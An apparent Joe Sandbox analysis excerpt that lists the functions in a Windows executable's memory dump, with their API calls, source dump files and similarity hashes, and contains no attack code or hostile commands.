ScreenToClient.USER32(?,?), ref: 007D5D99
GetClientRect.USER32(?,?), ref: 007D5ED7
GetWindowRect.USER32(?,?), ref: 007D5EF8

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 0fa9b6383501a4aa438a6b06655d11810584320e092292cdac4939154a7e445e
Instruction ID: 0252f31971b6efa8bbdf313df7ded63c0cf48758054d10c1dac653079472ab5b
Opcode Fuzzy Hash: 0fa9b6383501a4aa438a6b06655d11810584320e092292cdac4939154a7e445e
Instruction Fuzzy Hash: 06B17A34A0078ADBDB10DFA8C4807EEB7F5FF58310F14951AE8AAD7250DB34AA91DB54

Function 008001B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 008000BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008000D6
__allrem.LIBCMT ref: 008000ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0080010B
__allrem.LIBCMT ref: 00800122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00800140

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 0f0385c91fcdfdcebf9350d183a8348684148e0e794110d7802f00639b41d163
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 4C81E372A00B0A9BE7609E6CCC41B6AB3E9FF41724F24453AF651D73D1EB74D9408B91

Function 008061FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007F82D9,007F82D9,?,?,?,0080644F,00000001,00000001,8BE85006), ref: 00806258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0080644F,00000001,00000001,8BE85006,?,?,?), ref: 008062DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008063D8
__freea.LIBCMT ref: 008063E5

Part of subcall function 00803820: RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852

__freea.LIBCMT ref: 008063EE
__freea.LIBCMT ref: 00806413

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 32ba57176e4c3f681bc1456b994d918de332965fc12ee4ad0b3312f0dfddf4a6
Instruction ID: 92be9e69ae4976502bff7e389ee3251380130b3f3b9ea80b9980087ac0c2c31a
Opcode Fuzzy Hash: 32ba57176e4c3f681bc1456b994d918de332965fc12ee4ad0b3312f0dfddf4a6
Instruction Fuzzy Hash: B351BE72A00216ABEB658F64CC81EAF77A9FF45754F164629F805DA2C0EB34DC70C6A1

Function 0085BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

Part of subcall function 0085C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0085B6AE,?,?), ref: 0085C9B5
Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085C9F1
Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA68
Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0085BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0085BD25
RegCloseKey.ADVAPI32(00000000), ref: 0085BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0085BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0085BDF3
RegCloseKey.ADVAPI32(?), ref: 0085BDFF

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: a893ca4d1df27b50b1a3bd425f622008b65ad5aa5674a954304e7611c72000d6
Instruction ID: 3b6607683a3f4165a144611f118caeb40531c818bc8d1923a0a1aab9aea000f0
Opcode Fuzzy Hash: a893ca4d1df27b50b1a3bd425f622008b65ad5aa5674a954304e7611c72000d6
Instruction Fuzzy Hash: 4F813731208241EFD714DF24C895E2ABBE5FF84308F14855DF9998B2A2DB35ED49CB92

Function 0082F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0082F7B9
SysAllocString.OLEAUT32(00000001), ref: 0082F860
VariantCopy.OLEAUT32(0082FA64,00000000), ref: 0082F889
VariantClear.OLEAUT32(0082FA64), ref: 0082F8AD
VariantCopy.OLEAUT32(0082FA64,00000000), ref: 0082F8B1
VariantClear.OLEAUT32(?), ref: 0082F8BB

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: f658c71088b8e2506dde5d42d356b15cf8d58e657c3468a6c8163ae935248555
Instruction ID: 0ccc168390f1fc41c67341390627517478dbb6801ad57e8e689dca455443b97c
Opcode Fuzzy Hash: f658c71088b8e2506dde5d42d356b15cf8d58e657c3468a6c8163ae935248555
Instruction Fuzzy Hash: 2551B331600324EACF24AB65E895B29B7B4FF45314B249477EA06DF293DB748CC0C796

Function 0084910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625

Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 008494E5
_wcslen.LIBCMT ref: 00849506
_wcslen.LIBCMT ref: 0084952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00849585

Strings

X, xrefs: 00849412

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 8352f4a126d01df43134fd4a5e93cbd7ab427a31588f93046b5ee2e383f7db89
Instruction ID: 2eaa5ef3cfdf1ac415c8de29cab1cf5acae2deb7803fa82e606b8f50f602400f
Opcode Fuzzy Hash: 8352f4a126d01df43134fd4a5e93cbd7ab427a31588f93046b5ee2e383f7db89
Instruction Fuzzy Hash: 51E19E31604304DFC724DF24C885A6AB7E0FF85314F15896DE9999B3A2EB35ED05CB92

Function 007E920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2

BeginPaint.USER32(?,?,?), ref: 007E9241
GetWindowRect.USER32(?,?), ref: 007E92A5
ScreenToClient.USER32(?,?), ref: 007E92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007E92D3
EndPaint.USER32(?,?,?,?,?), ref: 007E9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008271EA

Part of subcall function 007E9339: BeginPath.GDI32(00000000), ref: 007E9357

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 87abe63f4f5480d8f14eecedcac7a3d20e4d0539fce1cbb5ced7da40dc2bf059
Instruction ID: f496609490f45d9eb5cfae87e6e53328883241418a4d25d64d4305ee33ff4861
Opcode Fuzzy Hash: 87abe63f4f5480d8f14eecedcac7a3d20e4d0539fce1cbb5ced7da40dc2bf059
Instruction Fuzzy Hash: 6341A071105250AFDB11DF26D888FBB7BA8FF5A320F140229FAA4C71A1C7759845DB62

Function 008407EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0084080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00840847
EnterCriticalSection.KERNEL32(?), ref: 00840863
LeaveCriticalSection.KERNEL32(?), ref: 008408DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 008408F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00840921

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: df68219daa4803ff8c5d2ca5066e6c9f5cd611d80c86f31a339bfe3e9389ef2b
Instruction ID: 937d67721e2bc28f733b7a1893f3c61b8d121a4770724a100b4a41486213b08e
Opcode Fuzzy Hash: df68219daa4803ff8c5d2ca5066e6c9f5cd611d80c86f31a339bfe3e9389ef2b
Instruction Fuzzy Hash: 88416B71900209EBDF14AF54DC85A6A7B78FF08300F1440A9EE00DA297DB74EE60DFA0

Function 008681DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0082F3AB,00000000,?,?,00000000,?,0082682C,00000004,00000000,00000000), ref: 0086824C
EnableWindow.USER32(?,00000000), ref: 00868272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 008682D1
ShowWindow.USER32(?,00000004), ref: 008682E5
EnableWindow.USER32(?,00000001), ref: 0086830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0086832F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 5cc2ff6f1706b3c0cdf6d58c703b6b6e7c3e9ba955614e879acf284e0270c153
Instruction ID: 15555c4e99de4006c9cb0bb30db23b547d3ddf712d5877362e699447f9fc4127
Opcode Fuzzy Hash: 5cc2ff6f1706b3c0cdf6d58c703b6b6e7c3e9ba955614e879acf284e0270c153
Instruction Fuzzy Hash: 71418334601644EFDF21CF25C9A9BA57BE1FB0A714F1A5269E64C8B362CB71A841CB50

Function 00834C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00834C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00834CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00834CEA
_wcslen.LIBCMT ref: 00834D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00834D10
_wcsstr.LIBVCRUNTIME ref: 00834D1A

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 872000e28eb2ff2298d8a2610e7ecec3ebd55546077e2aa6b22726fe49426f46
Instruction ID: 53eeae351c9b8f96ffd22143dcaf7d0818ebebe30baa3cd930492988a3b52d98
Opcode Fuzzy Hash: 872000e28eb2ff2298d8a2610e7ecec3ebd55546077e2aa6b22726fe49426f46
Instruction Fuzzy Hash: F1213B31205244BBEB155B35EC09E7B7B9CEF89750F10903DF805CA192EEB5EC0186E0

Function 0084581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 007D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D3A97,?,?,007D2E7F,?,?,?,00000000), ref: 007D3AC2

_wcslen.LIBCMT ref: 0084587B
CoInitialize.OLE32(00000000), ref: 00845995
CoCreateInstance.OLE32(0086FCF8,00000000,00000001,0086FB68,?), ref: 008459AE
CoUninitialize.OLE32 ref: 008459CC

Strings

.lnk, xrefs: 00845876, 008458C1, 00845985

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: dc990207dfd4852f9c14b46fd718e7763a5746b5af77d0a24ea02ad496dd31ab
Instruction ID: 993ee63a0d37814e2b24fa831c320c6a9768a624480fa157b41b43d6bf36c42d
Opcode Fuzzy Hash: dc990207dfd4852f9c14b46fd718e7763a5746b5af77d0a24ea02ad496dd31ab
Instruction Fuzzy Hash: BBD14171608609DFC714DF24C48492EBBE1FF89724F14895AF88A9B362DB31EC05CB92

Function 0083175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00830FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00830FCA
Part of subcall function 00830FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00830FD6
Part of subcall function 00830FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00830FE5
Part of subcall function 00830FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00830FEC
Part of subcall function 00830FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00831002

GetLengthSid.ADVAPI32(?,00000000,00831335), ref: 008317AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 008317BA
HeapAlloc.KERNEL32(00000000), ref: 008317C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 008317DA
GetProcessHeap.KERNEL32(00000000,00000000,00831335), ref: 008317EE
HeapFree.KERNEL32(00000000), ref: 008317F5

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 3c07dfa1ee25bf882803c02e6b17169f59c8f5888fd5ce6043eb3d3c18b629b5
Instruction ID: 85244599a7920b2770d4f397b113a604a1522899dbd0444918461bda0efe8b4b
Opcode Fuzzy Hash: 3c07dfa1ee25bf882803c02e6b17169f59c8f5888fd5ce6043eb3d3c18b629b5
Instruction Fuzzy Hash: 2711A932600605EFDF209FA4CC49BBE7BA9FB82759F184018F481E7214C776A944CBA0

Function 008314CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008314FF
OpenProcessToken.ADVAPI32(00000000), ref: 00831506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00831515
CloseHandle.KERNEL32(00000004), ref: 00831520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0083154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00831563

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: d7bd54e830a5804fec4fd70395d1fe0fbaf78140f23eeb3e12270bc008450929
Instruction ID: fb42983f28fea5760b6a1e812bbe37ecc69cd57d5a7874a827799b4545147533
Opcode Fuzzy Hash: d7bd54e830a5804fec4fd70395d1fe0fbaf78140f23eeb3e12270bc008450929
Instruction Fuzzy Hash: EE11597250020DABDF118F98DD49FEE7BA9FF88B44F054015FA05E2160C3B58E60DBA0

Function 007F3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,007F3379,007F2FE5), ref: 007F3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007F339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007F33B7
SetLastError.KERNEL32(00000000,?,007F3379,007F2FE5), ref: 007F3409

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0a0ab56a20d55588e2dbd3ba4a63c79e4043bad007ea3e197a5c17a2d7ec4595
Instruction ID: 2733c64a2ab8ef3faaa7d115941d00fb5f20b4c57a8063af797444aa450afb6e
Opcode Fuzzy Hash: 0a0ab56a20d55588e2dbd3ba4a63c79e4043bad007ea3e197a5c17a2d7ec4595
Instruction Fuzzy Hash: 7101DF33609719BEAA2537B8BC89A772A94FB05379B20022AF710C53F0EF5A4E115554

Function 00802D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00805686,00813CD6,?,00000000,?,00805B6A,?,?,?,?,?,007FE6D1,?,00898A48), ref: 00802D78
_free.LIBCMT ref: 00802DAB
_free.LIBCMT ref: 00802DD3
SetLastError.KERNEL32(00000000,?,?,?,?,007FE6D1,?,00898A48,00000010,007D4F4A,?,?,00000000,00813CD6), ref: 00802DE0
SetLastError.KERNEL32(00000000,?,?,?,?,007FE6D1,?,00898A48,00000010,007D4F4A,?,?,00000000,00813CD6), ref: 00802DEC
_abort.LIBCMT ref: 00802DF2

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a9957c160342e82ef4c53fb4474138595afe9b7c923dba02329f3363541cb3e1
Instruction ID: 37858004c1a21d95f50b84624bd964be2c58f25a0f9361e9290400223d51790b
Opcode Fuzzy Hash: a9957c160342e82ef4c53fb4474138595afe9b7c923dba02329f3363541cb3e1
Instruction Fuzzy Hash: 77F0C83664560467D6D2373CBC0EE2A2A5DFFC27A5F354519FD24D22E2EFE58C014162

Function 00868A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 007E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007E9693
Part of subcall function 007E9639: SelectObject.GDI32(?,00000000), ref: 007E96A2
Part of subcall function 007E9639: BeginPath.GDI32(?), ref: 007E96B9
Part of subcall function 007E9639: SelectObject.GDI32(?,00000000), ref: 007E96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00868A4E
LineTo.GDI32(?,00000003,00000000), ref: 00868A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00868A70
LineTo.GDI32(?,00000000,00000003), ref: 00868A80
EndPath.GDI32(?), ref: 00868A90
StrokePath.GDI32(?), ref: 00868AA0

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
